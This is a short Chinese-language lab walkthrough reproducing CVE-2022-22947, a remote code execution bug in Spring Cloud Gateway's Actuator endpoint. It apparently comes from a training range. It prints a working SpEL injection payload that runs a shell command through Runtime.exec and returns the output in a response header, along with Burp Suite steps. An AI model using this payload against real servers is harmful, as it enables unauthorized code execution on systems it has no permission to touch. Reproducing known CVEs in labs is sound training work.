靶场复现——Spring Cloud Gateway 远程代码执行漏洞

当启用和暴露 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求，从而远程执行任意代码。

Spring Cloud Gateway 提供了一个库，用于在 Spring WebFlux 之上构建 API 网关。

在 3.1.0 和 3.0.6 之前的版本中使用 Spring Cloud Gateway 的应用程序在启用、暴露和不安全的 Gateway Actuator 端点时容易受到代码注入攻击。远程攻击者可以发出恶意制作的请求，允许在远程主机上进行任意远程执行。

影响版本：

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway < 3.0.7

编号：CVE-2022-22947 

进入靶场：

刷新，使用burp抓包，将内容发送到Repeater模块。 

添加包含恶意SpEL表达式的路由，将payload粘贴到burpsuite替换掉原数据。（GET方式改为POST，恶意路由为hacktest，Content-Type为application/json）

 { "id": "EchoSec", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"cat\",\"/flag\"}).getInputStream()))}" } }], "uri": "http://example.com" }

如果不成功就多试几次，注意间距

刷新网关，执行SpEL表达式，将payload粘贴到burpsuite替换掉原数据。（注意Content-Type改为application/x-www-form-urlencoded）

发送以下内容，得到命令执行结果，将payload粘贴到burpsuite替换掉原数据。

 发送DELETE请求，删除恶意路由，将payload粘贴到burpsuite替换掉原数据。

再次发送同样的DELETE请求，发现为404，说明上一步已成功删除恶意路由。

 复现完成

这篇好文章是转载于：学新通技术网